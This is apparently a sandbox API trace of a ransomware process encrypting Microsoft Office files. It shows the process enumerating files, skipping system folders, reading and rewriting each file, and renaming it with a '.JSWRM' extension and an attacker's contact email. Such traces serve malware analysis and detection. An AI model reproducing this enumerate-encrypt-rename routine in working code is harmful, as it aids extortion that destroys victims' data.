[0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="...") returned 1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="windows") returned -1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="recovery") returned -1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="perflogs") returned -1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="documents and settings") returned -1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.318] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="system volume information") returned -1 [0131.319] lstrcmpiW (lpString1="AlertImage_FileOff.jpg", lpString2="msocache") returned -1 [0131.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOff.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOff.jpg", cchWideChar=22, lpMultiByteStr=0x241218, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileOff.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOff.jpg", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0131.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOff.jpg", cchWideChar=22, lpMultiByteStr=0x240f48, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileOff.jpg", lpUsedDefaultChar=0x0) returned 22 [0131.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.319] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.319] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoff.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.320] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=18142) returned 1 [0131.320] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.320] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x46d0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x46d0, lpOverlapped=0x0) returned 1 [0131.322] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.322] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x46d0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x46d0, lpOverlapped=0x0) returned 1 [0131.322] CloseHandle (hObject=0x264) returned 1 [0131.323] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoff.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOff.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoff.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.324] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6e, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_FileOffMask.bmp", cAlternateFileName="ALERTI~4.BMP")) returned 1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2=".") returned 1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="..") returned 1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="...") returned 1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="windows") returned -1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="recovery") returned -1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="perflogs") returned -1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="documents and settings") returned -1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="system volume information") returned -1 [0131.324] lstrcmpiW (lpString1="AlertImage_FileOffMask.bmp", lpString2="msocache") returned -1 [0131.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOffMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOffMask.bmp", cchWideChar=26, lpMultiByteStr=0x241268, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileOffMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0131.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOffMask.bmp", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0131.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_FileOffMask.bmp", cchWideChar=26, lpMultiByteStr=0x241038, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_FileOffMask.bmp", lpUsedDefaultChar=0x0) returned 26 [0131.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.324] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.324] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOffMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoffmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.325] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7278) returned 1 [0131.325] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.325] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c60, lpOverlapped=0x0) returned 1 [0131.327] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.327] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c60, lpOverlapped=0x0) returned 1 [0131.327] CloseHandle (hObject=0x264) returned 1 [0131.327] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOffMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoffmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_FileOffMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_fileoffmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.328] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13ca, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_High.jpg", cAlternateFileName="ALERTI~2.JPG")) returned 1 [0131.328] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2=".") returned 1 [0131.328] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="..") returned 1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="...") returned 1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="windows") returned -1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="recovery") returned -1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="perflogs") returned -1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="documents and settings") returned -1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="system volume information") returned -1 [0131.329] lstrcmpiW (lpString1="AlertImage_High.jpg", lpString2="msocache") returned -1 [0131.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_High.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_High.jpg", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_High.jpg", lpUsedDefaultChar=0x0) returned 19 [0131.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_High.jpg", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0131.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_High.jpg", cchWideChar=19, lpMultiByteStr=0x241128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_High.jpg", lpUsedDefaultChar=0x0) returned 19 [0131.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.329] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_high.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.330] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=5066) returned 1 [0131.330] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.330] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x13c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x13c0, lpOverlapped=0x0) returned 1 [0131.332] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.332] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x13c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x13c0, lpOverlapped=0x0) returned 1 [0131.332] CloseHandle (hObject=0x264) returned 1 [0131.332] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_high.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_High.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_high.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.333] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x19817013, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x19817013, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x19817013, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6e, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_HighMask.bmp", cAlternateFileName="ALERTI~3.BMP")) returned 1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2=".") returned 1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="..") returned 1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="...") returned 1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="windows") returned -1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="recovery") returned -1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="perflogs") returned -1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="documents and settings") returned -1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="$RECYCLE.BIN") returned 1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="system volume information") returned -1 [0131.333] lstrcmpiW (lpString1="AlertImage_HighMask.bmp", lpString2="msocache") returned -1 [0131.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_HighMask.bmp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_HighMask.bmp", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_HighMask.bmp", lpUsedDefaultChar=0x0) returned 23 [0131.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_HighMask.bmp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0131.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_HighMask.bmp", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_HighMask.bmp", lpUsedDefaultChar=0x0) returned 23 [0131.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.333] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.333] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_HighMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_highmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.334] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=7278) returned 1 [0131.334] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.334] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x1c60, lpOverlapped=0x0) returned 1 [0131.336] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.336] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x1c60, lpOverlapped=0x0) returned 1 [0131.336] CloseHandle (hObject=0x264) returned 1 [0131.336] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_HighMask.bmp" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_highmask.bmp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_HighMask.bmp.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_highmask.bmp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.337] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x41de, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_Medium.jpg", cAlternateFileName="ALF33C~1.JPG")) returned 1 [0131.337] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2=".") returned 1 [0131.337] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="..") returned 1 [0131.337] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="...") returned 1 [0131.337] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="windows") returned -1 [0131.337] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="recovery") returned -1 [0131.337] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="perflogs") returned -1 [0131.338] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="documents and settings") returned -1 [0131.338] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="$RECYCLE.BIN") returned 1 [0131.338] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="system volume information") returned -1 [0131.338] lstrcmpiW (lpString1="AlertImage_Medium.jpg", lpString2="msocache") returned -1 [0131.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Medium.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Medium.jpg", cchWideChar=21, lpMultiByteStr=0x240f20, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_Medium.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Medium.jpg", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0131.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AlertImage_Medium.jpg", cchWideChar=21, lpMultiByteStr=0x241330, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AlertImage_Medium.jpg", lpUsedDefaultChar=0x0) returned 21 [0131.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.338] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.338] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_medium.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0131.339] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=16862) returned 1 [0131.339] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.339] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x41d0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x41d0, lpOverlapped=0x0) returned 1 [0131.341] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.341] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x41d0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x41d0, lpOverlapped=0x0) returned 1 [0131.341] CloseHandle (hObject=0x264) returned 1 [0131.342] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_medium.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Medium.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\tooldata\\groove.net\\commondata\\alertimage_medium.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.343] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1983d259, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1983d259, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x198634b7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c6e, dwReserved0=0x60002, dwReserved1=0x2175ae, cFileName="AlertImage_MediumMAsk.bmp", cAlternateFileName="AL441A~1.BMP")) returned 1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2=".") returned 1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="..") returned 1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="...") returned 1 [0131.343] lstrcmpiW (lpString1="AlertImage_MediumMAsk.bmp", lpString2="windows") returned -1 [0131.343] lstrcmpiW 